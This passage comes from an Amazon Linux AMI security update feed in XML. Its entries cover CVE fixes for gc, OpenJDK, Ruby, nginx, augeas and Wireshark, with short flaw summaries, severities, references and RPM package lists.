version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.18-1.39.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.18" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.18-1.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-245</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-245: medium priority package update for gc</title><issued date="2013-11-04 14:53:00" /><updated date="2014-09-16 21:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-2673:
It was discovered that gc's implementation of the malloc() and calloc() routines did not properly perform parameter sanitization when allocating memory. If an application using gc did not implement application-level validity checks for the malloc() and calloc() routines, a remote attacker could provide specially crafted application-specific input, which, when processed by the application, could lead to an application crash or, potentially, arbitrary code execution with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2673" title="" id="CVE-2012-2673" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1500.html" title="" id="RHSA-2013:1500" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gc" version="7.1" release="12.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gc-7.1-12.6.amzn1.x86_64.rpm</filename></package><package name="gc-debuginfo" version="7.1" release="12.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gc-debuginfo-7.1-12.6.amzn1.x86_64.rpm</filename></package><package name="gc-devel" version="7.1" release="12.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/gc-devel-7.1-12.6.amzn1.x86_64.rpm</filename></package><package name="gc-devel" version="7.1" release="12.6.amzn1" epoch="0" arch="i686"><filename>Packages/gc-devel-7.1-12.6.amzn1.i686.rpm</filename></package><package name="gc" version="7.1" release="12.6.amzn1" epoch="0" arch="i686"><filename>Packages/gc-7.1-12.6.amzn1.i686.rpm</filename></package><package name="gc-debuginfo" version="7.1" release="12.6.amzn1" epoch="0" arch="i686"><filename>Packages/gc-debuginfo-7.1-12.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-246</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-246: important priority package update for java-1.6.0-openjdk</title><issued date="2013-11-05 13:35:00" /><updated date="2014-09-16 21:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5850:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5849:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5842:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5840:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5830:
The class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine.
CVE-2013-5829:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5825:
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-5823:
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-5820:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5817:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5814:
Multiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5809:
Multiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.
CVE-2013-5804:
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.
CVE-2013-5803:
The Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit.
CVE-2013-5802:
The FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions.
CVE-2013-5797:
Multiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.
CVE-2013-5790:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5784:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5783:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5782:
Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine.
CVE-2013-5780:
Various OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data.
CVE-2013-5778:
It was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory.
CVE-2013-5774:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5772:
The Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks.
CVE-2013-4002:
Multiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed.
CVE-2013-3829:
Multiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3829" title="" id="CVE-2013-3829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002" title="" id="CVE-2013-4002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5772" title="" id="CVE-2013-5772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5774" title="" id="CVE-2013-5774" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5778" title="" id="CVE-2013-5778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5780" title="" id="CVE-2013-5780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5782" title="" id="CVE-2013-5782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5783" title="" id="CVE-2013-5783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5784" title="" id="CVE-2013-5784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5790" title="" id="CVE-2013-5790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797" title="" id="CVE-2013-5797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5802" title="" id="CVE-2013-5802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5803" title="" id="CVE-2013-5803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5804" title="" id="CVE-2013-5804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5809" title="" id="CVE-2013-5809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5814" title="" id="CVE-2013-5814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5817" title="" id="CVE-2013-5817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5820" title="" id="CVE-2013-5820" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5823" title="" id="CVE-2013-5823" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5825" title="" id="CVE-2013-5825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5829" title="" id="CVE-2013-5829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5830" title="" id="CVE-2013-5830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5840" title="" id="CVE-2013-5840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5842" title="" id="CVE-2013-5842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5849" title="" id="CVE-2013-5849" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5850" title="" id="CVE-2013-5850" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1505.html" title="" id="RHSA-2013:1505" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="65.1.11.14.57.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-247</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-247: critical priority package update for ruby19</title><issued date="2013-11-22 21:42:00" /><updated date="2014-09-16 21:54:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4164:
1033460:
CVE-2013-4164 ruby: heap overflow in floating point parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4164" title="" id="CVE-2013-4164" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby19-irb" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.484-31.55.amzn1.noarch.rpm</filename></package><package name="ruby19-doc" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-31.55.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-31.55.amzn1.noarch.rpm</filename></package><package name="rubygems19" version="1.8.23" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23-31.55.amzn1.noarch.rpm</filename></package><package name="rubygems19-devel" version="1.8.23" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23-31.55.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-31.55.amzn1.x86_64.rpm</filename></package><package name="ruby19-devel" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="31.55.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-31.55.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.484-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="31.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-31.55.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-31.55.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-31.55.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.484-31.55.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-31.55.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.484-31.55.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.484-31.55.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.484-31.55.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.484" release="31.55.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.484-31.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-248</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-248: critical priority package update for ruby</title><issued date="2013-11-22 21:42:00" /><updated date="2014-09-16 21:54:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4164:
1033460:
CVE-2013-4164 ruby: heap overflow in floating point parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4164" title="" id="CVE-2013-4164" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby-debuginfo" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-debuginfo-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-devel" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-devel-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-libs" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-libs-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-rdoc" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-rdoc-1.8.7.374-2.11.amzn1.noarch.rpm</filename></package><package name="ruby-ri" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-ri-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-static" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-static-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-irb" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-irb-1.8.7.374-2.11.amzn1.noarch.rpm</filename></package><package name="ruby" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-1.8.7.374-2.11.amzn1.x86_64.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-debuginfo-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby-devel" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-devel-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby-libs" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-libs-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby-static" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-static-1.8.7.374-2.11.amzn1.i686.rpm</filename></package><package name="ruby-ri" version="1.8.7.374" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-ri-1.8.7.374-2.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-249</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-249: important priority package update for nginx</title><issued date="2013-12-02 20:27:00" /><updated date="2014-09-16 21:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4547:
nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attackers to bypass intended restrictions via an unescaped space character in a URI.
1032266:
CVE-2013-4547 nginx: security restriction bypass flaw due to whitespace parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4547" title="" id="CVE-2013-4547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.4.3" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.4.3-1.14.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.4.3" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.4.3-1.14.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.4.3" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.4.3-1.14.amzn1.i686.rpm</filename></package><package name="nginx" version="1.4.3" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.4.3-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-250</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-250: low priority package update for augeas</title><issued date="2013-12-02 20:28:00" /><updated date="2014-09-16 21:55:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-0787:
Multiple flaws were found in the way Augeas handled configuration files when updating them. An application using Augeas to update configuration files in a directory that is writable to by a different user (for example, an application running as root that is updating files in a directory owned by a non-root service user) could have been tricked into overwriting arbitrary files or leaking information via a symbolic link or mount point attack.
CVE-2012-0786:
Multiple flaws were found in the way Augeas handled configuration files when updating them. An application using Augeas to update configuration files in a directory that is writable to by a different user (for example, an application running as root that is updating files in a directory owned by a non-root service user) could have been tricked into overwriting arbitrary files or leaking information via a symbolic link or mount point attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0786" title="" id="CVE-2012-0786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0787" title="" id="CVE-2012-0787" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1537.html" title="" id="RHSA-2013:1537" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="augeas-devel" version="1.0.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-devel-1.0.0-5.5.amzn1.x86_64.rpm</filename></package><package name="augeas" version="1.0.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-1.0.0-5.5.amzn1.x86_64.rpm</filename></package><package name="augeas-debuginfo" version="1.0.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-debuginfo-1.0.0-5.5.amzn1.x86_64.rpm</filename></package><package name="augeas-libs" version="1.0.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-libs-1.0.0-5.5.amzn1.x86_64.rpm</filename></package><package name="augeas-libs" version="1.0.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-libs-1.0.0-5.5.amzn1.i686.rpm</filename></package><package name="augeas-debuginfo" version="1.0.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-debuginfo-1.0.0-5.5.amzn1.i686.rpm</filename></package><package name="augeas" version="1.0.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-1.0.0-5.5.amzn1.i686.rpm</filename></package><package name="augeas-devel" version="1.0.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-devel-1.0.0-5.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-251</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-251: medium priority package update for wireshark</title><issued date="2013-12-02 20:29:00" /><updated date="2014-09-16 22:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5721:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4936:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4935:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4934:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4933:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4932:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4931:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4927:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-4083:
Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2013-4081:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-3561:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-3559:
Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2013-3557:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6062:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6061:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6060:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6059:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-6056:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5600:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2012-5599:
